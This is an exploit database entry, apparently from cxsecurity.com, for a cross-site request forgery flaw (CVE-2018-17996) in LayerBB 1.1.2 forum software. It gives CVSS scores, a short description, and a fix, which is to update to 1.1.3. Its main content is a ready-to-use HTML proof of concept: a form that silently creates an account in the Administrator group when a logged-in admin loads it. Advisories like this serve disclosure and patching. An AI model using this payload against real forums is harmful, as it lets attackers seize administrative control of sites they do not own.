Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
LayerBB 1.1.2 Cross Site Request Forgery
2019-02-16 / 2019-02-15
Credit:
0xB9
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2018-17996
CWE:
CWE-352
Ogólna skala CVSS:
5.8/10
Znaczenie:
4.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery # Date: 10/4/2018 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://forum.layerbb.com # Version: 1.1.2 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-17996 1. Description: LayerBB is a free open-source forum software, the CSRF allows creating a admin user. 2. Proof of Concept: <!-- Create Admin User --> <html> <body> <form action="http://localhost/[path]/admin/new_user.php" method="POST"> <label for="username">Username</label> <input name="username" id="username" value="test" type="text"> <label for="password">Password</label> <input name="password" id="password" value="password123" type="password"> <label for="email">Email Address</label> <input name="email" id="email" value="test@localhost.co" type="text"> <label for="usergroup">Usergroup</label><br> <select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br> <input name="create" value="Create User" type="submit"> </form> </body> </html> <!-- Create Admin User End --> 3. Solution: Update to 1.1.3
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top